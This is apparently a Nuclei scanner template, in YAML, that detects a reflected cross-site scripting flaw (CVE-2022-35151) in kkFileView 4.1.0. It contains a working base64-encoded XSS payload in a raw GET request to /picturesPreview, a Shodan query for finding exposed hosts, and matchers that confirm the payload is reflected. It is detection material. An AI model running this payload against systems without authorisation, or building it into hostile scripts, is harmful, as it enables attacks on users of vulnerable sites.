55 lines
1.7 KiB
YAML
55 lines
1.7 KiB
YAML
id: CVE-2022-35151
|
|
|
|
info:
|
|
name: kkFileView 4.1.0 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
|
|
remediation: |
|
|
To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor.
|
|
reference:
|
|
- https://github.com/kekingcn/kkFileView/issues/366
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-35151
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-35151
|
|
cwe-id: CWE-79
|
|
epss-score: 0.02818
|
|
epss-percentile: 0.89566
|
|
cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: keking
|
|
product: kkfileview
|
|
shodan-query: http.html:"kkFileView"
|
|
tags: cve,cve2022,xss,kkfileview
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<svg/onload=alert(document.domain)>'
|
|
- '图片预览'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502206c292a73c6a84a7e7bfd08aa53243d066934d0a125ecff32e99e8028aa6d3171022100ec63d59fb72a0f4fae2c027c624f3aea27d566babd06f2768ba83e64c353d75b:922c64590222798bb761d5b6d8e72950
|